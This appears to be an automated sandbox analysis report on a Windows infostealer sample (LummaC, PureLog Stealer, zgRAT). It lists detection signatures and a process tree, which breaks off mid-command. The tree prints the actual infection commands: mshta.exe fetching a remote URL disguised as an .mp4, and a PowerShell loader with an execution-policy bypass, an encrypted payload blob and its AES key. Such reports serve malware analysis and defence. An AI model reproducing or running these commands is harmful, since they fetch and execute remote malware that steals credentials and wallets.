Edit tour
Windows
Analysis Report
Overview
Detection
LummaC, PureLog Stealer, zgRAT
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Yara detected Costura Assembly Loader
Yara detected MSILLoadEncryptedAssembly
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the clipboard data
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64native
- cmd.exe (PID: 2856 cmdline:
cmd /C ""C :\Windows\ system32\m shta.exe" https://pa wpaws.read it-carfana tics.com/m adonna.mp4 " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6556 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - mshta.exe (PID: 3068 cmdline:
"C:\Window s\system32 \mshta.exe " https:// pawpaws.re adit-carfa natics.com /madonna.m p4 MD5: 06B02D5C097C7DB1F109749C45F3F505) - powershell.exe (PID: 7292 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w 1 -ep U nrestricte d -nop fun ction qtyV d($UNYZ){r eturn -spl it ($UNYZ -replace ' ..', '0x$& ')};$ZKIH j = qtyVd( '943C2C5C4 6A72B5C4C8 C5C1A51E4F DD0974703B CE4EDF56B3 69378DFB2E CC854E2595 60AB569239 046F77EA06 A763337BD3 340FF80B07 C3CFCE3377 8E61B44845 B5324775EE 6ECAD2D2F3 7DD4F8DC9D 93A8ABA726 7AA5EA3400 79FA2334C6 4037144608 16209B0D04 11244284F7 B8814FD62C 23E419A8D0 47CB9595A5 1FEA7A3BCA 7328CC8FCA F14C3F8165 E90E2486DF AD60C27534 F2C51C86D7 F420CBBA4A BB44CACB35 74A60609ED 4B1F8BBC08 7D26FFE66E EB68F56868 20C155B787 83E6E11CF5 815FCD1E2F 8CA8C49791 C0C4DF291E A66A771292 1D9C59DB6E 39D4F98ED2 DC1A8E7A99 46079CA7BF 16CE0B32D0 41BED47781 FEB352BDF1 FB6018763D 773644268B 71F2526F6A 617A9272A9 ACDB0172FF 20C3D15477 82E3DBE0ED EC2C049AEA 1DCE874425 6C6E8717D8 6E602BF21D 022B7E4816 12FD0E5AD4 3DEF8AEFF4 BB1BB463D8 61888792AC 5CFDAC45C5 AAD05BEE91 DABCC7A8CE 6DC0862F3E 928BE382F0 93C9D84D38 A85151EEAB B858C33520 B5AABA90DF F68EE69A74 D113C6C05B C871865DA8 79842D0B54 C1DB7F4958 097D12CECC 5F9E39C9F6 EF9ADF065D DA2643775F F589BDDA14 8E4527B97D E7BA451AC1 EE997B73B0 A162517769 2622E47191 48456AC24D EEA746D100 F63E2E6264 6F66B245D3 EED88607AB 4D8A6022FA 2F645BBFA5 9344E4471C B907FA8E49 1AA033889D B9D942E3F5 420FF522C4 C2C6217479 BAC4143076 5CC37214D3 82A2392012 3068E397CA 5AE645C1D0 119DB511F8 B852EA4883 4469651D0E C476969F24 49303E7019 452064057C E45DC4E168 96B015B29C B64430183A F5618B1214 90DEE43084 DC3253BC82 E49716867C B584156D78 65E1FA9DA3 92090109DF 6E9A6CEFCA B60BE06389 6FE271D5F7 1457987474 55EBE31B24 E9BAE3DDE9 4E125C3AAB 0F1CC7DA5D 7D2C49F75D 3D71BE3450 EDFB23086A 4D618521B1 EE6EA4F775 9E9CFC1310 05524C9B65 D1D3D9FCB4 F3E8A222D8 020E082986 4F6709CEA9 7810C2185C B147F13C74 95B150A44F E94EC3E805 FBE21BAB82 B15870CAE5 60AAE4D4D5 33E433ABF4 E5A563B39F 36B23B6319 5F3779B0F8 E07AE51936 D7659CF473 54C6662908 5682950882 67D164DBF8 CD609767B8 170DEFEE21 B10CE5C724 4C519247C7 C2F9CE8D7F A4027320E4 43B37F498F 4BCDE2E63A 97AC0167DC BD9DF73193 FA93B3A828 59FC1C7C6A 740DD71406 82426D7269 E3DDEB5AB9 467EC828C2 C24E5D9149 A12D98DFF3 2D05203D75 36888907C2 9CA12DFCFB 29B179E5F8 0DF3C54531 8D33794FAE 90BEC7C573 D81530A72C 3E1664C1FC D78FFE0CC5 09A78F2E43 5BEE0A9EE5 E4C0F5F682 5B6883A784 655B387AC0 A63D3779D9 4D06E0C3BF C63D493D83 B351266304 E3C6A7FE93 8DB9F5FFD5 76369C82CA 0050C55C2E 8E82286D9A C048EE0F6E 20CF515B8D 1A1268959B 2D3E695204 352487CF35 33397B4291 7060A18226 2AA9F2EA0B 93E6742C4A 2C669E95CD 728');$MID Md=-join [ char[]](([ Security.C ryptograph y.Aes]::Cr eate()).Cr eateDecryp tor((qtyVd ('794A5742 476F737A6A 656E545246 734B')),[b yte[]]::ne w(16)).Tra nsformFina lBlock($ZK IHj,0,$ZKI